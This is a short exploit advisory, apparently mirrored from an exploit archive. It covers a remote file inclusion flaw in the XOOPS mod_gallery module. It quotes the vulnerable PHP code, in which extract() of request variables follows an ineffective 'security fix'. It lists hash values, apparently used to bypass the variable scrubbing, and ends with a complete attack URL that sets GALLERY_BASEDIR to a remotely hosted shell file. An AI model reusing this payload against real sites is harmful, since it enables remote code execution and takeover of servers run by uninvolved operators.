[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : XOOPS mod_gallery Zend_Hash_key + Extract RFI Vulnerability
# Published : 2008-01-06
# Author : Eugene Minaev
# Previous Title : Uebimiau Web-Mail 2.7.10/2.7.2 Remote File Disclosure Vulnerability
# Next Title : PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities
----[ XOOPS mod_gallery Zend_Hash_key + Extract RFI ... ITDefence.ru Antichat.ru ]
XOOPS mod_gallery Zend_Hash_key + Extract REMOTE FILE INCLUDE
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________
/ . / /_// // / / __ /__/ /
/ / /_// / / / / / /___/
/ / / / / / / / /
/ / / / / / / /__ //
/ ____________/ / / __________// /__ // /
/\ _______/ ________________/____/ 2007 /_//_/ // //
\ // // /
. \ -[ ITDEFENCE.ru Security advisory ]- // // / .
. _\________[________________________________________]_________//_//_/ . .
Bug works only with register_globals = OFF . I find their security fix very fun , and you ? : )
<?php
/* Begin Security Fix */
$scrubList = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_POST_FILES');
foreach ($scrubList as $outer)
{
foreach ($scrubList as $inner)
{
if (isset(${$outer}[$inner]))
{
unset(${$outer}[$inner]);
}
}
}
....some php code...
/* End Security Fix */
extract($_GET);
extract($_POST);
extract($_COOKIE);
?>
Hah .. very serious security fix , yeah :)
<?php
if (substr(PHP_OS, 0, 3) == 'WIN') {
require_once($GALLERY_BASEDIR . "platform/fs_win32.php");
} else {
require_once($GALLERY_BASEDIR . "platform/fs_unix.php");
}
?>
zend_hash_key_calc.exe GALLERY_BASEDIR
GALLERY_BASEDIR
PHP5 hash: -2093085906
PHP4 hash: -995617320
test.ru/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://path/to/m0nzt3r_shell.txt?&2093085906=1&995617320=2
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
# www.Syue.com [2008-01-06]